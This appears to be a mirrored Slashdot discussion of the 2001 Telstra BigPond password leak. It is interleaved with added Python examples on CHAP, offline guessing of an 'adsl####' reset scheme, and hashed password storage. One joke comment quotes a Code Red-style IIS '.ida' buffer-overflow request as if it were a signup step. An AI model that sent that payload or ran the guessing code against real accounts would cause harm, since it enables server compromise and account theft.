Slashdot Mirror


Telstra BigPond Passwords Leaked

Lord Cyric writes: "Telstra, DownUnder's biggest and baddest telco, had a major security breach yesterday when a sample of its BigPond Internet password list was posted on various newsboards. The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax. This hack exposes the passwords for most of Telstra's Internet services (dialup, cable & ADSL). With all the bad press Telstra has been receiving lately over its shoddy ADSL rollout and download caps, they certainly didn't need this ..." This site is not exactly the Telstra P.R. department.

35 of 97 comments

  1. their security is a joke... by Anonymous Coward · · Score: 3
    I am a former employee of Telstra and I worked in their internal web development department. I have to say, as far as desktop PCs go, there's not any major security. People just come in, fiddle with hardware and just leave.

    When someone has a problem they get the person who looks good from 2 cubicles down to fix it and he/she just screws up half the settings and services on the machine, which compromises the security.

    Leave your house door open and intruders come in.

  2. What the hell are you talking about? by Wakko+Warner · · Score: 2
    Lack of vigilance on the users' part? They got ALL the passwords and they're posting a SAMPLE of them. Unless you think everyone in Australia is too stupid to pick an unguessable password.

    How the fuck can it not be Telstra's fault?

    --
    "Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
  3. BRAVO!! by Wakko+Warner · · Score: 2
    This is the funniest thing I've read on slashdot in quite some time...

    --
    "Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
  4. Re:this is crazy by unitron · · Score: 3

    There seems to be a higher rate of crack-smoking moderators lately, but that's probably not related.

    --

    I see even classic Slashdot is now pretty much unusable on dial-up.

  5. Calm down people by hayden · · Score: 4

    Before I start I'll just say I am a Bigpond Cable subscriber.

    Without more info there is no way of knowing if this is a crack or PEBCAK. It's entirely possible that this was done with social engineering or trojan(s), not a 1337 4ax0r. So far all that's known is that 70 accounts were compromised by some method.

    To put it in perspective, recently somebody sent an email to a large number of Bigpond users pretending to be from Telstra asking them for their password and credit card number just so they could check their records. A depressing number of people replied. We're not talking about the most security literate people in the world here.

    Telstra uses pretty much standard PPPoE for ADSL although they do use the ADSL modems that had the security problem a while back.

    We've also heard that Telstra has already caught the person responsible.

    BTW the "Australian Broadband Users Group" are widely regarded among Australian broadband users to be a bunch of self-important tools who are pretty much out to make themselves look big. The only guy who's worth listening to is the guy that runs www.whirlpool.net.au The rest are just dead weight.

    --
    Nerd: Derogatory term typically directed at anybody with a lower Slashdot ID than you.
  6. Re:Good Engineering Practices by Skapare · · Score: 2

    More often the problem lies with management that won't allow the engineers to carry out best practices. This is because the best practices involve things that take extra time. Since the sales people usually commit product delivery often even before the development department ever heard of it, management gets really cranky about delivery times. Quality just goes out the window because that isn't what sales committed the company to.

    Let's rake some managers and marketers over the coals first.

    --
    now we need to go OSS in diesel cars
  7. Re:If it was a decent system.. by eddy · · Score: 2

    If it was a decent system the hashes of the passwords would be stored, not the passwords themselves (encrypted or not)

    --
    Belief is the currency of delusion.
  8. Re:If it was a decent system.. by A+Masquerade · · Score: 2

    > If it was a decent system the passwords would all be encrypted, and it would not allow insecure passwords.

    I keep seeing this sort of stuff - presumably referring to hashed passwords rather than encrypted. However there is a problem... if you use APOP or CHAP or similar the server end needs to have plaintext equivalent passwords on its end. Typically this means that the RADIUS servers have the plaintext passwords available. This is problematic - you would prefer to keep passwords hashed, but frankly it's normally easier to nail down your RADIUS server than it is to nail down all the networking and other stuff to prevent sniffing of authentication sessions (and CHAP etc prevents those sniffs being useful).

    So don't assume plaintext passwords on authentication servers are necessarily a bad thing.

  9. Re:man. by thogard · · Score: 2

    From what I can tell, if Telstra resets your password it's to something like "adsl####". Someone told me that they pick a new password every day.

    It's also a real mess to change since there's broken software there too!

    It's just how things are done on the Information Super Outback!
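
    The tension comment 8 describes (CHAP protects the exchange on the wire but forces the RADIUS end to hold a plaintext-equivalent secret) and the "adsl####" reset scheme from comment 9 fit together in one exchange. The following is an added example, not code from the original page or from Telstra; `ChapServer`, its user table and the sample secrets are constructed for illustration. It implements the MD5 CHAP response from RFC 1994, shows the server verifying it from a plaintext store, shows the PAP alternative where the server can keep only a hash, and then has a sniffer who captured (identifier, challenge, response) walk the 10,000-candidate reset keyspace offline.

    ```python
    import hashlib
    import os
    import secrets
    from typing import Dict, Optional, Tuple


    def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
        """CHAP with MD5 (RFC 1994): Response = MD5(Identifier || Secret || Challenge)."""
        return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


    class ChapServer:
        """Hypothetical RADIUS-style authenticator (not Telstra's). To check a CHAP
        response it must recompute the MD5 over the secret itself, so the store
        has to hold the plaintext (or a plaintext-equivalent) for every user."""

        def __init__(self, users: Dict[str, bytes]):
            self.users = users  # username -> plaintext secret (constructed sample data)

        def new_challenge(self) -> Tuple[int, bytes]:
            return secrets.randbelow(256), os.urandom(16)

        def verify(self, username: str, identifier: int, challenge: bytes, response: bytes) -> bool:
            secret = self.users.get(username)
            if secret is None:
                return False
            expected = chap_response(identifier, secret, challenge)
            return secrets.compare_digest(expected, response)


    def pap_store(secret: bytes) -> bytes:
        """The alternative: with PAP the client sends the secret itself, so the
        server can keep only a one-way hash. Exposure moves from at-rest to in-transit."""
        return hashlib.sha256(secret).digest()


    def pap_verify_hashed(stored_hash: bytes, presented_secret: bytes) -> bool:
        return secrets.compare_digest(hashlib.sha256(presented_secret).digest(), stored_hash)


    def crack_reset_scheme(identifier: int, challenge: bytes, response: bytes) -> Optional[str]:
        """Offline guess against a sniffed CHAP exchange, walking the 'adsl####'
        reset scheme from comment 9: only 10,000 candidates. CHAP stops replay of
        the captured response; it does not stop guessing of a low-entropy secret."""
        for n in range(10_000):
            guess = f"adsl{n:04d}".encode()
            if chap_response(identifier, guess, challenge) == response:
                return guess.decode()
        return None


    def demo() -> dict:
        # Constructed users: one left on the reset scheme, one with a real passphrase.
        server = ChapServer({"weak": b"adsl0420", "strong": b"correct horse battery staple"})
        results = {}
        for user in ("weak", "strong"):
            ident, chal = server.new_challenge()
            resp = chap_response(ident, server.users[user], chal)  # what the client computes
            results[user] = {
                "accepted": server.verify(user, ident, chal, resp),
                "wrong_rejected": not server.verify(user, ident, chal, b"\x00" * 16),
                "cracked_as": crack_reset_scheme(ident, chal, resp),  # what the sniffer gets
            }
        return results


    if __name__ == "__main__":
        for user, r in demo().items():
            print(user, r)
    ```

    Running `demo()` shows both users authenticating, but only the "adsl####" user being recovered from the sniffed transcript; the passphrase user survives because 10,000 guesses do not cover the space. Which store to protect harder is the trade-off comment 8 is making; the example only makes the cost of the plaintext side concrete.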

  10. Thanks Telstra! by wct · · Score: 4

    As a BigPond ADSL user I have much to be thankful for. Thanks for the two-weeks downtime last month, changing the user agreement on download restrictions after the contract was signed, and forcing me to call every 4 days to reset my account when an authentication error on your end hangs the connection.

    But most of all, thanks for leaking the account passwords through poor security and having the foresight to keep the server down right now so I can't change mine.

  11. Which is why as a sysadmin by Velox_SwiftFox · · Score: 3

    I prefer to not know users' passwords. If they forget them I replace the password with one they have to change immediately, with automatic checking for crackable ones.

  12. Re:Telstra in denial by szcx · · Score: 4
    To be more accurate, they're blaming user stupidity. They're saying that a password-ripping trojan is responsible (which is entirely possible).

    From NineMSN:

    Telstra retail corporate affairs manager Stuart Gray said the virus, which operated on broadband users, collected the user names and passwords, automatically sending them back to the person who had activated the virus.

    "BigPond has not been hacked. What has happened is a Trojan virus has been lodged on a number of BigPond users," he told AAP tonight.

    Mr Gray said the hacker responsible had placed the user names and passwords of 69 BigPond customers on websites.

    BigPond had contacted the customers, changing their passwords and closing down their sites so other people couldn't use their names.

    The virus had been found on the websites of the customers contacted.

    "It's a real warning for broadband customers how important it is for them to have the latest anti-virus software and firewall software and protect themselves as much as possible," he said.

    Telstra is evil, but this looks more like the work of idiot users.

    Keep the pitchfork and flaming torches handy though, they'll fuck up sooner or later.

  13. they don't use SSL either by Swordfish · · Score: 2

    Another bad thing about the Telstra passwords is that they don't use any SSL to cover any of the access to subscribers' info. Therefore it just might be that the passwords were obtained from the net in transit - not necessarily from an in-situ source. At least, they don't use any SSL when I'm using my accounts, for which I've just changed my passwords, of course.

    city: Adelaide, South Australia

  14. Who wants the pass anyway.... by Bryan_Crowl · · Score: 4

    with only 3 gigs a month (upstream and down) the adsl and cable *unlimited* accounts are just about useless. Maybe this will force someone in the Government (who still own 51% of telstra) to do something.

    --
    Someday, we'll look back on this, laugh nervously and change the subject.
  15. What they've been saying by bonoboy · · Score: 3

    Telstra's claiming that the 96 passwords published represented the entire list, not a sample. They've cancelled all the accounts concerned and re-provisioned (translation: re-generated random passwords) and contacted everyone concerned. They're saying it was the result of a trojan, which they've found installed on every one of the users' devices.

    On some of the Australian mailing lists, we've had individuals claiming that whatever it is, it must be Telstra's fault. Come on, they're not particularly nice guys as far as responsible corporations go, but poor security must be the fault of the software vendors and lack of vigilance on the users' parts.

    Just trying to install some sanity before all of this stuff gets repeated here once again....

    --
    toeslikefingers.com - because
  16. Telstra Bashing by matthew_gream · · Score: 2

    Irrespective of where fault lies, anyone not familiar with Australia should realise that "Telstra Bashing" is virtually a national sport, and typically involves a lack of objectivity. This usually clouds any issue involving the company.

    --
    -- Matthew - matthew.gream@pobox.com, http://matthewgream.net
  17. Not a hoax? by wolvie_ · · Score: 5
    The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax.

    What? The site which originally broke the story (CORE) have now posted another article saying Telstra's servers were probably not cracked. Specifically:

    Sub7 or some other "netbus" program has been used to leech the accounts of the users machines. This is at the moment the scenario I favour...

    Sure, Telstra fucked up their ADSL network and extremely pissed off many users with their download caps, but there isn't proof yet that they screwed up on this too.

  18. It's Just Privatisation In Action by Self+Bias+Resistor · · Score: 2

    As a resident of Australia, this doesn't come as a big surprise to me. Ever since the Liberal government decided that selling off Telstra would actually be a *good* idea, the service has just gone completely downhill. Of course, in some ways it was never great to begin with but privatising it just makes it worse.

    The point that successive governments (state and federal) don't understand is when you privatise a service, you change whatever the service is responsible to. Public-sector services are responsible to the government, who are in turn responsible (at least, they used to be) to the people. Politicians can be very sensitive to voter dissatisfaction (so the theory goes), especially around election times. But when you privatise the service, it becomes a private-sector entity whose responsibility is to the shareholders, not the people. Profits become the primary focus, and the quality of service declines. Witness such effects with the electricity and natural gas industries in Australia, and the electrical industry in California (the one currently being bailed out with taxpayers' money). What's worse is that Telstra, being the government body in charge of telecommunications, was the one that set up and maintained all the infrastructure (phone lines etc). This puts them in a wonderful monopoly position as they own practically most of the telecommunications infrastructure in Australia (Optus has some infrastructure of their own as well as leasing from Telstra), and therefore can effectively charge what they like. Not only do the customers pay high prices for inferior service from Telstra, they have to pay high prices to Telstra's competitors because Telstra also charges high prices for them to use their network.

    Telstra should have never been privatised to begin with. It was a simple election ploy for little Johnny Howard so that he would have some money to throw around, a way to buy votes. The Liberal government will spend the money on grand election promises and when they are voted out (it's only a matter of time, really) they will leave the successive Labor government with a dilemma. Raise income taxes/GST or sell off Telstra completely (the latter being the most likely). The sad reality of this is that while Telstra is responsible to the shareholders, the "mum-and-dad" shareholders that were meant to be the main beneficiaries of the sale hold precious little stock and can do absolutely nothing to influence the way the company is run.

    The same Liberal government that sold Telstra is also unable (more likely they are unwilling) to send in the ACCC (Australian Competition and Consumer Commission, the same people who said "no thank you" to DVD regional zoning) and put the hard word on Telstra to improve their service. So, to be honest, this whole sorry saga has been an ill-conceived, money-motivated botch from the word go. Unless we either send in the ACCC and try to get some real results, or buy back the 51% of Telstra already sold (and pay for it later through higher national debt), this situation is unlikely to change.

    Self Bias Resistor

    --

    ----------
    When the pin is pulled, Mr. Grenade is no longer our friend.

  19. This is why! by slashdoter · · Score: 2
    This is why I don't use the same password on anything I want to keep a secret. Think of the fun some 11 year old will have using google to search for a username pulled off the list and finding another company that the DSL client uses and logging in using the same password off of the list. Say I used "slashdoter" as my DSL account name, you just plug Slashdoter into google and the second hit is my user page on slashdot. Every time this happens the company comes out and says change your password! but then never says change ALL your passwords that relate to the cracked one.

    I just can't wait for hailstorm and .net, at least now it's a two step process to hack my life, à la The Net.

    --
    Does anyone actually have a Java program designed to control air traffic, or for the operation of a nuclear facility?
  20. Re:man. by rneches · · Score: 2
    Um, that means that a cracker only needs to try 9999 combinations. You can also rule out a lot of the low-entropy ones, like 00-fi-ln-00 and 12-fi-ln-34. That leaves you with an even smaller list of probables.

    A dictionary attack would probably use a dictionary 5 or 10 times that size, and wouldn't take all that much time to run. A 500 Mhz system can process a lot of ~12 character strings in an hour.

    I strongly suggest you try a different scheme.

    --
    In spite of the suggestions and all the tests that I have made, I have not cavato a spider from the hole.
  21. liable? by rneches · · Score: 5
    Does the law in Australia allow companies to be held liable for breaches in security? It seems to me that it would be bad faith at the very least. On the other hand, I can't think of an example where a company
    • had crappy security
    • got hacked, hurting their users and customers in a tangible way
    • were sued by their customers
    • lost/settled with their customers
    As far as I can tell, the hackers are the ones considered culpable, not the incompetent admins who let them in. Is there a legal basis for this, or is it just the way things work? Or am I being paranoid?

    --
    In spite of the suggestions and all the tests that I have made, I have not cavato a spider from the hole.
    1. Re:liable? by cthugha · · Score: 2

      There is no law of criminal negligence with regard to security AFAIK. But if you lose something or are harmed as a result of a security breach (and that could include the loss of private/personal information), you could pursue them under the civil law of negligence, I would imagine.

    2. Re:liable? by cthugha · · Score: 2

      So what are you saying? That we entrust our money into the banks' safekeeping, but they have no legal responsibility whatsoever to keep it safe? That's ridiculous (IMHO). Banks aren't liable for bank robberies because they take reasonable care to ensure that your money's safe. That doesn't mean it's totally safe, but they've done everything reasonable to keep it safe.

    3. Re:liable? by cthugha · · Score: 2

      On Telstra's side is a lot of money and for some users the fact that outage didn't "cost" them much.

      "Loss" is an interesting question in this case. If some 31337 h4x0r uses up my download quota (which I've paid for), that would count as loss. If I have to do a security audit, or take other corrective measures to counter the risks that sensitive information should now be considered to be in the public domain, then the cost of those measures would count as loss as well. But I imagine their exclusion clauses would exempt them from common law liability (Telstra would be stupid if they didn't do that), so the question is moot.

    4. Re:liable? by doug363 · · Score: 2
      I have a minor nitpick: referring to Australia as "relatively non-ligitious" [sic]. I've heard that this is a fallacy, and that Australia actually has more lawsuits per capita than the USA (which is considered by most Australians as being far more litigious).

      As far as the rest of your post goes, I think it is right on the mark (but IANAL). Negligence involves not taking reasonable precautions against events which could be damaging to others. Whether these events involve a third party breaking the law or not is irrelevant.

    5. Re:liable? by tdelaney · · Score: 2

      There is a difference.

      Banks are insured. If they are robbed, customers are not affected, except those who were personally at the scene. Banks assume that there will be problems.

      OTOH, if someone gets my account details from the bank, in any manner, and then proceeds to use my account, then I expect the bank to fully protect me from any consequences of their poor security, and failure to do so would be grounds for a lawsuit.

      Likewise, if someone gets my bigpond account details, they may be able to use them to do damage both to me personally and by masquerading as me. It is the ISP's job to ensure that this does not happen, and I expect to be fully protected from any consequences of someone gaining my details from my ISP. Failure to do so could well be grounds for a lawsuit, even in the relatively non-ligitious Australia.

      Storing username/password lists in plaintext anywhere definitely falls under insufficient security. In fact, the password should only be stored as a one-way cipher, so that I *can't* ring up, give my details and be told my password, but instead simply have it reset to a known password which I can then change immediately.
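
    Comments 11, 20 and the reply above all describe the same account-handling pattern: keep only a one-way hash so nobody can be told a password, reset to a temporary value the user must change at once, and refuse passwords that a 10,000-candidate or dictionary search would find. The following is an added example of that pattern, not code from the original page or from any ISP; `AccountStore`, the PBKDF2 work factor, the stub word list and the `adsl####` pattern check are assumptions made for illustration.

    ```python
    import hashlib
    import os
    import re
    import secrets
    import string
    from typing import Dict

    PBKDF2_ITERATIONS = 100_000                 # assumed work factor; tune to your hardware
    RESET_PATTERN = re.compile(r"^adsl\d{4}$")  # the 'adsl####' scheme from comment 9
    COMMON_WORDS = {"password", "telstra", "bigpond", "letmein", "qwerty"}  # constructed stub list


    def is_crackable(password: str) -> bool:
        """Reject passwords a dictionary or pattern search would find quickly."""
        if len(password) < 8 or password.lower() in COMMON_WORDS:
            return True
        if RESET_PATTERN.match(password):       # only 10,000 candidates (comment 20)
            return True
        classes = sum(bool(re.search(p, password)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
        return classes < 2


    def hash_password(password: str, salt: bytes) -> bytes:
        """Salted one-way hash; the plaintext is never stored."""
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


    class AccountStore:
        """Hypothetical ISP account table: only salt + hash are kept, so nobody,
        support staff included, can read a password back over the phone."""

        def __init__(self) -> None:
            self._rows: Dict[str, dict] = {}

        def set_password(self, user: str, password: str) -> None:
            if is_crackable(password):
                raise ValueError("password rejected by crackability check")
            salt = os.urandom(16)
            self._rows[user] = {"salt": salt, "hash": hash_password(password, salt), "must_change": False}

        def reset(self, user: str) -> str:
            """Support-desk reset: a random temporary password, returned once and not
            retained, with must_change set so it is good for nothing but choosing a new one."""
            alphabet = string.ascii_letters + string.digits
            temp = "".join(secrets.choice(alphabet) for _ in range(12))
            salt = os.urandom(16)
            self._rows[user] = {"salt": salt, "hash": hash_password(temp, salt), "must_change": True}
            return temp

        def login(self, user: str, password: str) -> str:
            """Returns 'ok', 'must_change' or 'denied'."""
            row = self._rows.get(user)
            if row is None:
                hash_password(password, b"\x00" * 16)   # spend the same time for unknown users
                return "denied"
            if not secrets.compare_digest(hash_password(password, row["salt"]), row["hash"]):
                return "denied"
            return "must_change" if row["must_change"] else "ok"

        def support_view(self, user: str) -> dict:
            """What a phone agent can see: never the hash, never a password."""
            row = self._rows[user]
            return {"user": user, "must_change": row["must_change"]}


    if __name__ == "__main__":
        store = AccountStore()
        store.set_password("alice", "Kangaroo!Cable42")
        print(store.login("alice", "Kangaroo!Cable42"))   # ok
        temp = store.reset("alice")
        print(store.login("alice", "Kangaroo!Cable42"))   # denied: old password gone
        print(store.login("alice", temp))                 # must_change
        print(store.support_view("alice"))
    ```

    The `must_change` state is what makes a phone reset safe to hand out: whoever talks the help desk into a reset gets a credential that can only be used to set a new password, and the legitimate user discovers the takeover the moment their own password stops working. The crackability check is deliberately simple; a real one would use a proper word list, but the point is that a fixed scheme such as `adsl####` fails it by pattern, not by length.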

  22. Re:routine changes by ckedge · · Score: 3

    All right, I'll bite.

    What specific circumstances does "changing passwords regularly" protect against?

    Assume that my passwords are all "very strong", they are not written down anywhere, and they're never transmitted in the clear over an un-secure network.

    The only circumstance I can foresee this "helping" with (besides idiotic ones like people losing the pieces of paper they have their passwords written on), is where it's already in the hands of a "criminal". But AFAIK if someone already has a single user account, further user accounts (existing and specially-created) and the root account isn't far behind.

    Can anyone point me to a scholarly analysis of the exact merits of regular password changing?

    Why? Because I don't do it. If I were, with 20 different passwords and all of them of the "Strong" type, I'd be forced to write them down, or spend hours and hours figuring out 'mind games' to try and remember them, and even worse it would (and did in past years) result in an ever increasing number of "confused and forgotten" passwords. (Frequently occurs within 1-2 weeks of a change, when you just happened to not use that account, and so now your mind is groping in among not only all your current passwords but the previous 1-3 rounds of passwords, and suddenly you're screwed. No fun.)

  23. possible new cable in Canberra... by Technodummy · · Score: 2

    haven't looked anything up about it, as I don't live there, but they're doing some strange kind of deal with cable and free phone calls, ACT Electricity and Water are doing it... ACTEW...

    anyone heard anything else about it?

  24. And the lucky 69 users are... by 0x00 · · Score: 3

    This is the forum where the usernames were posted. Apparently it only affects Telstra BigPond ADSL users.
    --
    0x00
    l33t cl0wnZ

  25. Telstra in denial by James+Foster · · Score: 4

    As you can read here Telstra are in fact denying any crack taking place. They're blaming it on the users!

  26. And... by Scoria · · Score: 2

    ... The passwords getting out could have been prevented by using strong encryption.

    Or, if nothing else, encryption could have delayed the attackers getting the list...

    --
    Do you like German cars?
    1. Re:And... by Scoria · · Score: 3

      I forgot:

      The proper encryption method would be double ROT13. Then they could sue under the DMC... wait, too bad Australia isn't the the United States, eh Telstra? ::sigh::

      --
      Do you like German cars?
  27. telstra's problem has been solved by circletimessquare · · Score: 4

    luckily telstra has embraced the obvious future of authentication on the internet and decided on a unilateral capitulation to microsoft's passport service. resistance is futile! duh!

    all of their subscribers have been sent an email saying to get a new user name and password by just sending the following simple http request to www.passport.com ;-)

    GET /default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff% u0078%u0000%u00=a HTTP/1.0

    --
    intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
  28. Mass Murderer by Rebulator · · Score: 2

    Did timothy all of a sudden become the only one to post stories? Did he go on a killing spree?

    grin

    Reb

  29. Not a Hoax by justinf · · Score: 4

    There is a good article, and a good discussion thread available at http://www.whirlpool.net.au. It outlines the fact that the passwords would never be stored in plaintext (the passwords are stored on industry-standard enterprise servers), and that many of the released passwords were extremely strong (suggesting the passwords were not cracked).

    It seems only natural to assume someone has spent some time collecting logins and passwords via another method, and is posting their results with the view of creating FUD over Telstra's service. Just because 69 passwords have been obtained, doesn't mean there exists a vulnerability for the tens or hundreds of thousands of subscribers of the service.

    I don't particularly like Telstra, nor do I use their internet, but I don't believe they are this stupid.